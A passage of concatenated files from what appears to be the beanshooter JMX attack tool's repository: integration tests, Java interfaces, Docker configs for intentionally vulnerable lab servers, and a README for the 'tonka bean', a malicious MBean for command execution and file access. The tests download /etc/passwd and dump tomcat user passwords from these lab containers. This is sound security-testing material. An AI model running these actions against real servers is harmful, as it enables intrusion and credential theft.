groups: 8 | - cmdline 9 | id_pattern: '11-01-{:02}' 10 | 11 | tests: 12 | - title: Get cmdline 13 | description: |- 14 | Obtain the servers cmdline 15 | 16 | command: 17 | - beanshooter 18 | - diagnostic 19 | - cmdline 20 | - ${TARGET} 21 | - ${OPTIONS} 22 | 23 | validators: 24 | - error: False 25 | - contains: 26 | values: 27 | - 'VM Arguments' 28 | - '-Dcom.sun.management.jmxremote.port=1090' 29 | - '-Dcom.sun.management.jmxremote.rmi.port=1090' 30 | - '-Dcom.sun.management.jmxremote.password.file=/usr/local/tomcat/conf/jmxremote.password' 31 | - '-Dcom.sun.management.jmxremote.access.file=/usr/local/tomcat/conf/jmxremote.access' 32 | -------------------------------------------------------------------------------- /docker/README.md: -------------------------------------------------------------------------------- 1 | ### Docker Containers 2 | 3 | --- 4 | 5 | This directory contains the sources to build the *beanshooter* example servers. These are docker 6 | containers that expose intentionally vulnerable *JMX* services. These can be used to practice usage 7 | of *beanshooter* and to understand the attack surface on *JMX* endpoints. 8 | 9 | The following containers are currently available: 10 | 11 | * [jmx-example-server](./jmx-example-server) - This container exposes several ports that can be used to 12 | access the *JMX* agent. Some of them can be accessed without authentication, others require valid 13 | credentials. There are *RMI* based *JMX* endpoints and *JMX* endpoints that need to be contacted via 14 | *JMXMP*. The different *JMXMP* endpoints all use different *SASL* mechanisms. 15 | * [tomcat](./tomcat) - Just a plain *Apache tomcat* server with *JMX* enabled. This can be used to verify 16 | that *beanshooters tomcat* related actions work like expected. 17 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/plugin/IMBeanServerProvider.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.plugin; 2 | 3 | import java.util.Map; 4 | 5 | import javax.management.MBeanServerConnection; 6 | 7 | import org.jolokia.client.exception.J4pRemoteException; 8 | 9 | import de.qtc.beanshooter.exceptions.AuthenticationException; 10 | import de.qtc.beanshooter.exceptions.PluginException; 11 | 12 | /** 13 | * beanshooter supports different ways for obtaining a connection to an remote MBeanServer (e.g. rmi vs jmxmp). 14 | * The different providers need to implement this interface. Furthermore, plugins can implement this interface 15 | * to provide additional ways to connect to a remote MBeanServer. 16 | * 17 | * @author Tobias Neitzel (@qtc_de) 18 | */ 19 | public interface IMBeanServerProvider 20 | { 21 | public MBeanServerConnection getMBeanServerConnection(String host, int port, Map env) throws AuthenticationException, PluginException, J4pRemoteException; 22 | } 23 | -------------------------------------------------------------------------------- /tests/jolokia/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: Jolokia releated tests 3 | description: |- 4 | This folder contains tests related to the jolokia adapter 5 | 6 | groups: 7 | - jolokia 8 | 9 | containers: 10 | - name: 'jolokia-example-server' 11 | image: 'ghcr.io/qtc-de/beanshooter/jolokia-example-server:1.0' 12 | volumes: 13 | - '${volume}:${volume-d}' 14 | aliases: 15 | DOCKER-jolokia-example-server-IP: DOCKER-IP 16 | DOCKER-jolokia-example-server-GATEWAY: DOCKER-GW 17 | init: 5 18 | 19 | variables: 20 | TARGET: 21 | - ${DOCKER-IP} 22 | - 8080 23 | - --jolokia 24 | - --username 25 | - manager 26 | - --password 27 | - admin 28 | 29 | TARGET_NO_AUTH: 30 | - ${DOCKER-IP} 31 | - 8080 32 | - --jolokia 33 | 34 | testers: 35 | - ./tomcat/tricot.yml 36 | - ./diagnostic/tricot.yml 37 | - ./mlet/tricot.yml 38 | - ./hotspot/tricot.yml 39 | - ./recorder/tricot.yml 40 | - ./basic/tricot.yml 41 | -------------------------------------------------------------------------------- /docker/jolokia/README.md: -------------------------------------------------------------------------------- 1 | ### Jolokia Example Server 2 | 3 | ---- 4 | 5 | The *jolokia-example-server* is a docker container that runs an *Apache tomcat service* that exposes 6 | *JMX* services on two different endpoints. The first endpoint is `1090/TCP` that supports regular 7 | *RMI* based *JMX* connections. The second one is `8080/TCP` that supports *JMX* connections via 8 | [Jolokia](https://github.com/rhuss/jolokia). 9 | 10 | *Jolokia* is configured to allow [proxy mode](https://jolokia.org/reference/html/proxy.html). To test 11 | proxy mode, you can either proxy to the *RMI* based *JMX* endpoint on the same server or you can launch 12 | an additional container e.g. by using ad [docker-compose.yml](./docker-compose.yml) like this: 13 | 14 | ```yml 15 | version: '3.7' 16 | 17 | services: 18 | tomcat: 19 | image: ghcr.io/qtc-de/beanshooter/jolokia-example-server:1.0 20 | 21 | backend-jmx: 22 | image: ghcr.io/qtc-de/beanshooter/jmx-example-server:2.0 23 | ``` 24 | -------------------------------------------------------------------------------- /tests/tomcat-server/tomcat/info/rmi/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tomcat info action (RMI) 3 | description: |- 4 | Perform tests on the info action within the submenu of the tomcat operation. 5 | 6 | id: '05-04-01' 7 | groups: 8 | - rmi 9 | id_pattern: '05-04-01-{:02}' 10 | 11 | 12 | tests: 13 | - title: Info 14 | description: |- 15 | Use the info operation 16 | 17 | command: 18 | - beanshooter 19 | - tomcat 20 | - info 21 | - ${TARGET} 22 | - ${OPTIONS} 23 | 24 | validators: 25 | - error: False 26 | - contains: 27 | values: 28 | - 'MBean Class: org.apache.catalina.mbeans.MemoryUserDatabaseMBean' 29 | - 'ObjectName: Users:type=UserDatabase,database=UserDatabase' 30 | - 'Attributes:' 31 | - 'Operations:' 32 | - 'pathname (type: java.lang.String , writable: true)' 33 | - 'java.lang.String findGroup(java.lang.String groupname)' 34 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/exceptions/MismatchedURIException.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.exceptions; 2 | 3 | /** 4 | * MismatchedURIExceptions occur when the DIGEST-MD5 SASL mechanism was used and 5 | * the specified server name does not match the actual hostname. 6 | * 7 | * @author Tobias Neitzel (@qtc_de) 8 | */ 9 | public class MismatchedURIException extends AuthenticationException { 10 | 11 | private static final long serialVersionUID = 1L; 12 | 13 | public MismatchedURIException(Exception e) 14 | { 15 | super(e, false); 16 | } 17 | 18 | public MismatchedURIException(Exception e, boolean showDetails) 19 | { 20 | super(e, showDetails); 21 | } 22 | 23 | public Exception getOriginalException() 24 | { 25 | return origException; 26 | } 27 | 28 | public String getUri() 29 | { 30 | String message = getMessage(); 31 | message = message.substring(message.lastIndexOf(" ") + 1); 32 | return message.replace("jmxmp/", ""); 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /docker/tomcat/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.7' 2 | 3 | services: 4 | tomcat: 5 | image: ghcr.io/qtc-de/beanshooter/tomcat-example-server:2.0 6 | build: . 7 | entrypoint: /opt/start.sh 8 | environment: 9 | - > 10 | _JAVA_OPTIONS= 11 | -Djavax.net.ssl.keyStorePassword=password 12 | -Djavax.net.ssl.keyStore=/opt/store.p12 13 | -Djavax.net.ssl.keyStoreType=pkcs12 14 | -Djava.rmi.server.hostname=iinsecure.example 15 | -Dcom.sun.management.jmxremote 16 | -Dcom.sun.management.jmxremote.ssl=false 17 | -Dcom.sun.management.jmxremote.local.only=false 18 | -Dcom.sun.management.jmxremote.authenticate=false 19 | -Dcom.sun.management.jmxremote.port=1090 20 | -Dcom.sun.management.jmxremote.rmi.port=1099 21 | volumes: 22 | - ./resources/trust/store.p12:/opt/store.p12 23 | - ./resources/scripts/start.sh:/opt/start.sh 24 | - ./resources/conf/tomcat-users.xml:/usr/local/tomcat/conf/tomcat-users.xml 25 | -------------------------------------------------------------------------------- /tests/jolokia/basic/deploy/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: deploy action 3 | description: |- 4 | Perform tests on beanshooters deploy action. Since deploy is not supported 5 | for Jolokia, these tests are rather short. 6 | 7 | id: '15-03' 8 | groups: 9 | - deploy 10 | - target 11 | id_pattern: '15-03-01-{:02}' 12 | 13 | 14 | tests: 15 | - title: Deploy StringMonitor 16 | description: |- 17 | Attempt to deploy the StringMonitor MBean 18 | 19 | command: 20 | - beanshooter 21 | - deploy 22 | - ${TARGET} 23 | - ${OPTIONS} 24 | - javax.management.monitor.StringMonitor 25 | - 'qtc.test:type=Monitor' 26 | 27 | validators: 28 | - error: True 29 | - contains: 30 | values: 31 | - 'Creating new MBeans is not supported by Jolokia' 32 | - 'New MBeans can only be loaded if the MLet MBean is already available.' 33 | - 'If this is the case you can use beanshooters mlet load action to load new MBeans.' 34 | - 'Cannot continue from here.' 35 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/networking/DummyTrustManager.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.networking; 2 | 3 | import java.security.cert.CertificateException; 4 | import java.security.cert.X509Certificate; 5 | import javax.net.ssl.X509TrustManager; 6 | 7 | /** 8 | * A dummy implementation for a trust manager. Accepts all certificates. 9 | * Should never be used within of other applications where trust matters. 10 | * Not sure where this code was initially from. Probably copied from this 11 | * project gist: https://gist.github.com/matthewromano/4178946 12 | * 13 | * @author Tobias Neitzel (@qtc_de) 14 | */ 15 | public class DummyTrustManager implements X509TrustManager 16 | { 17 | public X509Certificate[] getAcceptedIssuers() { 18 | return null; 19 | } 20 | 21 | public void checkClientTrusted(X509Certificate[] chain, String authType) 22 | throws CertificateException { 23 | } 24 | 25 | public void checkServerTrusted(X509Certificate[] chain, String authType) 26 | throws CertificateException { 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/mbean/diagnostic/DiagnosticCommandMBean.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.mbean.diagnostic; 2 | 3 | import javax.management.MBeanException; 4 | 5 | import de.qtc.beanshooter.mbean.INative; 6 | 7 | /** 8 | * The DiagnosticCOmmandMBean interface implements some methods that are usually exposed under the 9 | * DiagnosticCommand object name. Usually, the amount of exposed methods is quite larger that the 10 | * methods implemented in this interface and a full list of methods can be obtained by using 11 | * beanshooters info action together with the diagnostic MBean. 12 | * 13 | * @author Tobias Neitzel (@qtc_de) 14 | */ 15 | public interface DiagnosticCommandMBean extends INative 16 | { 17 | public String compilerDirectivesAdd(String[] directives) throws MBeanException; 18 | public String jvmtiAgentLoad(String[] paths) throws MBeanException; 19 | public String vmLog(String[] arguments) throws MBeanException; 20 | public String vmSystemProperties() throws MBeanException; 21 | public String vmCommandLine() throws MBeanException; 22 | } 23 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/mbean/flightrecorder/FlightRecorderMXBean.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.mbean.flightrecorder; 2 | 3 | import javax.management.MBeanException; 4 | import javax.management.openmbean.TabularData; 5 | 6 | /** 7 | * Interface of available FlightRecorder operations. Since we only implement a subset of the 8 | * actually available operations exposed by this MBean, we use a custom interface 9 | * instead of the original one. 10 | * 11 | * @author Tobias Neitzel (@qtc_de) 12 | */ 13 | public interface FlightRecorderMXBean 14 | { 15 | public long newRecording() throws MBeanException; 16 | public long openStream(long recordingId, TabularData streamOptions) throws MBeanException; 17 | public void closeStream(long streamId) throws MBeanException; 18 | public byte[] readStream(long streamId) throws MBeanException; 19 | public void startRecording(long recordingId) throws MBeanException; 20 | public void stopRecording(long recordingId) throws MBeanException; 21 | public void copyTo(long recordingId, String outputFile) throws MBeanException; 22 | } 23 | -------------------------------------------------------------------------------- /tests/tomcat-server/tomcat/enum/rmi/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tomcat enum action (RMI) 3 | description: |- 4 | Perform tests on beanshooters enum action for RMI based connections 5 | 6 | id: '05-03-01' 7 | groups: 8 | - rmi 9 | id_pattern: '05-03-01-{:02}' 10 | 11 | 12 | tests: 13 | - title: Plain enum 14 | description: |- 15 | Use the enum action on the tomcat endpoint 16 | 17 | command: 18 | - beanshooter 19 | - enum 20 | - ${TARGET} 21 | - ${OPTIONS} 22 | 23 | validators: 24 | - error: False 25 | - contains: 26 | values: 27 | - 'Remote MBean server does not require authentication' 28 | - 'Remote MBeanServer rejected the payload class' 29 | - 'org.apache.catalina.mbeans.MemoryUserDatabaseMBean' 30 | - 'Listing 3 tomcat users' 31 | - 'manager' 32 | - 'P@55w0rD#' 33 | - 'admin' 34 | - 's3cr3T!$' 35 | - 'status' 36 | - 'cr@cKM3o.O' 37 | - 'Users:type=Role,rolename="manager-gui",database=UserDatabase' 38 | -------------------------------------------------------------------------------- /tests/jmx-example-server-2/tonka/download/jmxmp/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tonka download action (JMXMP) 3 | description: |- 4 | Perform tests on beanshooters tonka download action for JMXMP based connections 5 | 6 | id: '03-06-02' 7 | groups: 8 | - jmxmp 9 | id_pattern: '03-06-02-{:02}' 10 | 11 | 12 | tests: 13 | - title: Download /etc/passwd 14 | description: |- 15 | Download the /etc/passwd file from the MBeanServer 16 | 17 | command: 18 | - beanshooter 19 | - tonka 20 | - download 21 | - ${JMXMP_NTLM} 22 | - ${OPTIONS} 23 | - --username 24 | - controlRole 25 | - --password 26 | - control 27 | - /etc/passwd 28 | 29 | validators: 30 | - error: False 31 | - contains: 32 | values: 33 | - 'Saving remote file /etc/passwd to local path' 34 | - 'bytes were written' 35 | - file_contains: 36 | - file: passwd 37 | contains: 38 | - 'root:x:0:0:' 39 | - file_exists: 40 | cleanup: True 41 | files: 42 | - passwd 43 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/cli/Operation.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.cli; 2 | 3 | /** 4 | * beanshooter was designed with extensibility in mind. The argument layout is centered 5 | * around operations that can be invoked on MBeans available within the MBean server. For 6 | * each MBean, beanshooter may defines an enum that implements the Operation interface. 7 | * This enum contains the operations that are supported by the corresponding MBean and needs 8 | * to make the interface functions available. beanshooter can then integrate them into the 9 | * argument layout automatically. 10 | * 11 | * Apart from adding the enum implementing Operation, the MBean must also be registered within 12 | * the de.qtc.beanshooter.mbean.MBean class. It is recommended to look at the already existing 13 | * MBean implementations in the de.qtc.beanshooter.mbean package. 14 | * 15 | * @author Tobias Neitzel (@qtc_de) 16 | */ 17 | public interface Operation 18 | { 19 | public String getName(); 20 | public String getDescription(); 21 | public boolean containsOption(Option option); 22 | public void invoke(); 23 | } 24 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/mbean/tonkabean/TonkaBeanMBean.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.mbean.tonkabean; 2 | 3 | import javax.management.MBeanException; 4 | import javax.management.RuntimeMBeanException; 5 | 6 | /** 7 | * Interface of supported TonkaBean operations. We could also import it from the TonkaBean package, but defining 8 | * it here demonstrates better which components are required for registering a new MBean with beanshooter. This 9 | * could probably be helpful for new developers in future. 10 | * 11 | * @author Tobias Neitzel (@qtc_de) 12 | */ 13 | public interface TonkaBeanMBean 14 | { 15 | public String version() throws MBeanException; 16 | public String[] shellInit() throws MBeanException; 17 | public String toServerDir(String cwd, String change) throws MBeanException, RuntimeMBeanException; 18 | 19 | public byte[] executeCommand(String[] cmd, String cwd, String[] env, boolean background) throws MBeanException; 20 | 21 | public byte[] downloadFile(String filename) throws MBeanException; 22 | public String uploadFile(String destination, String filename, byte[] content) throws MBeanException; 23 | } 24 | -------------------------------------------------------------------------------- /tests/jolokia/hotspot/set/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: hotspot set action 3 | description: |- 4 | Perform tests on beanshooters hotspot set action 5 | 6 | id: '13-04' 7 | groups: 8 | - set 9 | id_pattern: '13-04-01-{:02}' 10 | 11 | tests: 12 | - title: Set option 13 | description: |- 14 | Attempt to set a diagnostic option value 15 | 16 | command: 17 | - beanshooter 18 | - hotspot 19 | - set 20 | - ${TARGET} 21 | - ${OPTIONS} 22 | - HeapDumpPath 23 | - /tmp/test 24 | 25 | validators: 26 | - error: False 27 | - contains: 28 | values: 29 | - 'Option was set successfully' 30 | 31 | - title: Verify 32 | description: |- 33 | Verify the newly set option value 34 | 35 | command: 36 | - beanshooter 37 | - hotspot 38 | - get 39 | - ${TARGET} 40 | - ${OPTIONS} 41 | - HeapDumpPath 42 | 43 | validators: 44 | - error: False 45 | - contains: 46 | values: 47 | - 'Name: HeapDumpPath' 48 | - 'Value: /tmp/test' 49 | 50 | testers: 51 | - ./error/tricot.yml 52 | -------------------------------------------------------------------------------- /tests/tomcat-server/hotspot/set/rmi/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: hotspot set action (RMI) 3 | description: |- 4 | Perform tests on beanshooters hotspot set action for RMI based connections 5 | 6 | id: '08-04-01' 7 | groups: 8 | - rmi 9 | id_pattern: '08-04-01-{:02}' 10 | 11 | tests: 12 | - title: Set option 13 | description: |- 14 | Attempt to set a diagnostic option value 15 | 16 | command: 17 | - beanshooter 18 | - hotspot 19 | - set 20 | - ${TARGET} 21 | - ${OPTIONS} 22 | - HeapDumpPath 23 | - /tmp/test 24 | 25 | validators: 26 | - error: False 27 | - contains: 28 | values: 29 | - 'Option was set successfully' 30 | 31 | - title: Verify 32 | description: |- 33 | Verify the newly set option value 34 | 35 | command: 36 | - beanshooter 37 | - hotspot 38 | - get 39 | - ${TARGET} 40 | - ${OPTIONS} 41 | - HeapDumpPath 42 | 43 | validators: 44 | - error: False 45 | - contains: 46 | values: 47 | - 'Name: HeapDumpPath' 48 | - 'Value: /tmp/test' 49 | -------------------------------------------------------------------------------- /beanshooter/src/de/qtc/beanshooter/utils/DeserializationCanary.java: -------------------------------------------------------------------------------- 1 | package de.qtc.beanshooter.utils; 2 | 3 | import java.io.Serializable; 4 | 5 | /** 6 | * When performing deserialization attacks, beanshooter usually sends a payload of type Object[]. 7 | * The first item in the Object[] array is the actual gadget object. The second type is the 8 | * DeserializationCanary. Since deserialization of array types occurs one by one, this can be used 9 | * to detect whether the gadget class was accepted by the server. 10 | * 11 | * 1. If an error occurs while deserialization of the gadget class, the DeserializationCanary 12 | * is never attempted to be deserialized and we obtain the exception that was thrown while 13 | * deserializing the gadget class. 14 | * 15 | * 2. If the gadget class was deserialized successfully, the DeserializationCanary is loaded 16 | * and throws an ClassNotFoundException that we can detect on the client side. 17 | * 18 | * @author Tobias Neitzel (@qtc_de) 19 | */ 20 | public class DeserializationCanary implements Serializable { 21 | 22 | private static final long serialVersionUID = 4091744402596907989L; 23 | } 24 | -------------------------------------------------------------------------------- /tests/jolokia/basic/info/error/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: info action (Error) 3 | description: |- 4 | Performs some test on error cases that can occur during the info action 5 | 6 | id: '15-05-02' 7 | groups: 8 | - error 9 | id_pattern: '15-05-02-{:02}' 10 | 11 | tests: 12 | - title: Invalid Object Name 13 | description: |- 14 | Invoke the info action with an invalid object name as target 15 | 16 | command: 17 | - beanshooter 18 | - info 19 | - ${TARGET} 20 | - ${OPTIONS} 21 | - test 22 | 23 | validators: 24 | - error: True 25 | - contains: 26 | values: 27 | - The specified ObjectName test is invalid 28 | 29 | 30 | - title: Not available ObjectName 31 | description: |- 32 | Invoke the info action with an object name that does not exist 33 | 34 | command: 35 | - beanshooter 36 | - info 37 | - ${TARGET} 38 | - ${OPTIONS} 39 | - test:v=1 40 | 41 | validators: 42 | - error: True 43 | - contains: 44 | values: 45 | - The specified MBean test:v=1 does probably not exist on the endpoint 46 | -------------------------------------------------------------------------------- /docker/jolokia/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.7' 2 | 3 | services: 4 | tomcat: 5 | image: ghcr.io/qtc-de/beanshooter/jolokia-example-server:1.0 6 | build: . 7 | entrypoint: /usr/local/tomcat/conf/start.sh 8 | environment: 9 | - > 10 | _JAVA_OPTIONS= 11 | -Dorg.jolokia.jsr160ProxyEnabled=true 12 | -Djava.rmi.server.hostname=localhost 13 | -Dcom.sun.management.jmxremote 14 | -Dcom.sun.management.jmxremote.ssl=false 15 | -Dcom.sun.management.jmxremote.local.only=true 16 | -Dcom.sun.management.jmxremote.authenticate=false 17 | -Dcom.sun.management.jmxremote.port=1090 18 | -Dcom.sun.management.jmxremote.rmi.port=1090 19 | -Dcom.sun.management.jmxremote.password.file=/usr/local/tomcat/conf/jmxremote.password 20 | -Dcom.sun.management.jmxremote.access.file=/usr/local/tomcat/conf/jmxremote.access 21 | volumes: 22 | - ./resources/scripts/start.sh:/usr/local/tomcat/conf/start.sh 23 | - ./resources/conf/jmxremote.access:/usr/local/tomcat/conf/jmxremote.access 24 | - ./resources/conf/jmxremote.password:/usr/local/tomcat/conf/jmxremote.password 25 | -------------------------------------------------------------------------------- /tests/tomcat-server/diagnostic/load/error/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: diagnostic load action (RMI) 3 | description: |- 4 | Perform tests on the error handling of beanshooters diagnostic load action 5 | 6 | id: '06-02-02' 7 | groups: 8 | - error 9 | id_pattern: '06-02-02-{:02}' 10 | 11 | 12 | tests: 13 | - title: Load a non existing library 14 | description: |- 15 | Attempt to load a non existing shared library 16 | 17 | command: 18 | - beanshooter 19 | - diagnostic 20 | - load 21 | - ${TARGET} 22 | - ${OPTIONS} 23 | - /nonono 24 | 25 | validators: 26 | - error: False 27 | - contains: 28 | values: 29 | - 'The server was unable to find the shared library' 30 | 31 | 32 | - title: Load a directory 33 | description: |- 34 | Attempt to load an directory as shared library 35 | 36 | command: 37 | - beanshooter 38 | - diagnostic 39 | - load 40 | - ${TARGET} 41 | - ${OPTIONS} 42 | - /etc 43 | 44 | validators: 45 | - error: False 46 | - contains: 47 | values: 48 | - 'The specified filename /etc is a directory' 49 | -------------------------------------------------------------------------------- /tests/jolokia/hotspot/dump/error/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: hotspot dump action (Error) 3 | description: |- 4 | Perform tests on the error handling of beanshooters hotspot dump action 5 | 6 | id: '13-01-02' 7 | groups: 8 | - error 9 | id_pattern: '13-01-02-{:02}' 10 | 11 | 12 | tests: 13 | - title: Non extisting dir 14 | description: |- 15 | Attempt to create the dump in a non existing dir 16 | 17 | command: 18 | - beanshooter 19 | - hotspot 20 | - dump 21 | - ${TARGET} 22 | - ${OPTIONS} 23 | - /nonono/nonono.hprof 24 | 25 | validators: 26 | - error: True 27 | - contains: 28 | values: 29 | - 'The parent directory of /nonono/nonono.hprof seems not to exist' 30 | 31 | - title: Wrong extension 32 | description: |- 33 | Attempt to create a dump with an invalid file extension. 34 | 35 | command: 36 | - beanshooter 37 | - hotspot 38 | - dump 39 | - ${TARGET} 40 | - ${OPTIONS} 41 | - /tmp/test.jsp 42 | 43 | validators: 44 | - error: False 45 | - contains: 46 | values: 47 | - 'Heapdump file must have .hprof extention' 48 | -------------------------------------------------------------------------------- /tests/jolokia/tomcat/enum/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tomcat enum action 3 | description: |- 4 | Performs beanshooters regular enum action, but on a server 5 | with tomcat related MBeans available 6 | 7 | id: '10-03' 8 | groups: 9 | - enum 10 | id_pattern: '10-03-{:02}' 11 | 12 | tests: 13 | - title: Plain enum 14 | description: |- 15 | Use the enum action on the tomcat endpoint 16 | 17 | command: 18 | - beanshooter 19 | - enum 20 | - ${TARGET} 21 | - ${OPTIONS} 22 | 23 | validators: 24 | - error: False 25 | - contains: 26 | values: 27 | - 'Login successful! The specified credentials are correct' 28 | - 'Agent Version 1.7.1 - Protocol Version: 7.2' 29 | - 'Jolokia Proxy Mode is enabled! You may connect to backend JMX services' 30 | - 'org.apache.catalina.mbeans.MemoryUserDatabaseMBean' 31 | - 'Listing 3 tomcat users' 32 | - 'manager' 33 | - 'admin' 34 | - 'admin' 35 | - 's3cr3T!$' 36 | - 'status' 37 | - 'cr@cKM3o.O' 38 | - 'Users:type=Role,rolename="manager-gui",database=UserDatabase' 39 | -------------------------------------------------------------------------------- /tests/tomcat-server/diagnostic/logfile/error/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: diagnostic logfile action (Error) 3 | description: |- 4 | Perform tests on the error handling of beanshooters diagnostic logfile action 5 | 6 | id: '06-03-02' 7 | groups: 8 | - error 9 | id_pattern: '06-03-02-{:02}' 10 | 11 | 12 | tests: 13 | - title: Set logfile to non existing dir 14 | description: |- 15 | Set logfile to non existing dir 16 | 17 | command: 18 | - beanshooter 19 | - diagnostic 20 | - logfile 21 | - ${TARGET} 22 | - ${OPTIONS} 23 | - /nonono/nonono 24 | 25 | validators: 26 | - error: False 27 | - contains: 28 | values: 29 | - 'The server was unable to write to' 30 | 31 | 32 | - title: Set logfile to existing dir 33 | description: |- 34 | Set logfile to existing dir 35 | 36 | command: 37 | - beanshooter 38 | - diagnostic 39 | - logfile 40 | - ${TARGET} 41 | - ${OPTIONS} 42 | - /etc 43 | 44 | validators: 45 | - error: False 46 | - contains: 47 | values: 48 | - 'Unable to log to file /etc with log file rotation: /etc is not a regular file' 49 | -------------------------------------------------------------------------------- /tests/tomcat-server/diagnostic/read/error/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: diagnostic read action (RMI) 3 | description: |- 4 | Perform tests on the error handling of beanshooters diagnostic read action 5 | 6 | id: '06-01-02' 7 | groups: 8 | - error 9 | id_pattern: '06-01-02-{:02}' 10 | 11 | 12 | tests: 13 | - title: Read non existing file 14 | description: |- 15 | Attempt to read a non existing file 16 | 17 | command: 18 | - beanshooter 19 | - diagnostic 20 | - read 21 | - ${TARGET} 22 | - ${OPTIONS} 23 | - /nonono 24 | 25 | validators: 26 | - error: False 27 | - contains: 28 | values: 29 | - 'The server was unable to open the file' 30 | - 'This could mean that the file does not exist, is a directory or the sever is missing permissions' 31 | 32 | 33 | - title: Read binary 34 | description: |- 35 | Attempt to read /bin/bash 36 | 37 | command: 38 | - beanshooter 39 | - diagnostic 40 | - read 41 | - ${TARGET} 42 | - ${OPTIONS} 43 | - /bin/bash 44 | 45 | validators: 46 | - error: False 47 | - contains: 48 | values: 49 | - 'ELF' 50 | -------------------------------------------------------------------------------- /tonka-bean/README.md: -------------------------------------------------------------------------------- 1 | ### Tonka Bean 2 | 3 | ---- 4 | 5 | The *tonka bean* is an example for a malicious *MBean* that can be deployed on a *JMX* server. 6 | It allows to execute arbitrary operating system commands and provides access to the file system 7 | of the *JMX* server. 8 | 9 | The *tonka bean* is intended to be deployed and consumed by *beanshooters* `tonka` operation. 10 | When building *beanshooter*, the *tonka bean* is automatically build too and included into the 11 | *beanshooter* jar file. Building the *tonka bean* manually or using a pre compiled version of it 12 | is therefore not necessary. 13 | 14 | The *tonka bean* implements the following interface: 15 | 16 | ```java 17 | public interface TonkaBeanMBean 18 | { 19 | public String version(); 20 | public String[] shellInit(); 21 | public String toServerDir(String current, String change) throws IOException, InvalidPathException; 22 | public byte[] downloadFile(String filename) throws IOException; 23 | public String uploadFile(String destination, String filename, byte[] content) throws IOException; 24 | public byte[] executeCommand(String[] cmd, String cwd, Map env, boolean background) throws IOException, InterruptedException; 25 | } 26 | ``` 27 | -------------------------------------------------------------------------------- /tests/jmx-example-server/info/error/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: info action (Error) 3 | description: |- 4 | Performs some test on error cases that can occur during the info action 5 | 6 | id: '01-08-02' 7 | groups: 8 | - error 9 | id_pattern: '01-08-02-{:02}' 10 | 11 | 12 | tests: 13 | - title: Invalid Object Name 14 | description: |- 15 | Invoke the info action with an invalid object name as target 16 | 17 | command: 18 | - beanshooter 19 | - info 20 | - ${TARGET_PLAIN} 21 | - ${OPTIONS} 22 | - test 23 | 24 | validators: 25 | - error: True 26 | - contains: 27 | values: 28 | - The specified ObjectName test is invalid 29 | 30 | 31 | - title: Not available ObjectName 32 | description: |- 33 | Invoke the info action with an object name that does not exist 34 | 35 | command: 36 | - beanshooter 37 | - info 38 | - ${TARGET_PLAIN} 39 | - ${OPTIONS} 40 | - test:v=1 41 | - --username 42 | - admin 43 | - --password 44 | - admin 45 | 46 | validators: 47 | - error: True 48 | - contains: 49 | values: 50 | - The specified MBean test:v=1 does probably not exist on the endpoint 51 | -------------------------------------------------------------------------------- /tests/jmx-example-server/deploy/error/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: deploy action (Error) 3 | description: |- 4 | Perform tests on the error handling of beanshooters deploy action 5 | 6 | id: '01-03-03' 7 | groups: 8 | - error 9 | id_pattern: '01-03-03-{:02}' 10 | 11 | 12 | tests: 13 | - title: Malformed ObjectName 14 | description: |- 15 | Attempt a deployment with an invalid ObjectName 16 | 17 | command: 18 | - beanshooter 19 | - deploy 20 | - ${TARGET_UNAUTH} 21 | - ${OPTIONS} 22 | - javax.management.monitor.StringMonitor 23 | - Sample 24 | 25 | validators: 26 | - error: True 27 | - contains: 28 | values: 29 | - The specified ObjectName Sample is invalid 30 | 31 | 32 | - title: Unknown Class 33 | description: |- 34 | Attempt a deployment with an unknown class 35 | 36 | command: 37 | - beanshooter 38 | - deploy 39 | - ${TARGET_UNAUTH} 40 | - ${OPTIONS} 41 | - TEST 42 | - de.qtc.beanshooter:version=1 43 | 44 | validators: 45 | - error: True 46 | - contains: 47 | values: 48 | - The specified class TEST is not known by the server 49 | - Use the --jar-file and --stager-url options 50 | -------------------------------------------------------------------------------- /tests/tomcat-server/tomcat/list/error/tricot.yml: -------------------------------------------------------------------------------- 1 | tester: 2 | title: tomcat list action (Error) 3 | description: |- 4 | Perform tests on the error handling of beanshooters tomcat list action 5 | 6 | id: '05-06-02' 7 | groups: 8 | - error 9 | id_pattern: '05-06-02-{:02}' 10 | 11 | 12 | tests: 13 | - title: Undeploy UserMemoryDatabaseBean 14 | description: |- 15 | Undeploy the MBean that is used for listing the users 16 | 17 | command: 18 | - beanshooter 19 | - tomcat 20 | - undeploy 21 | - ${TARGET} 22 | - ${OPTIONS} 23 | 24 | validators: 25 | - error: False 26 | - contains: 27 | values: 28 | - 'Removing 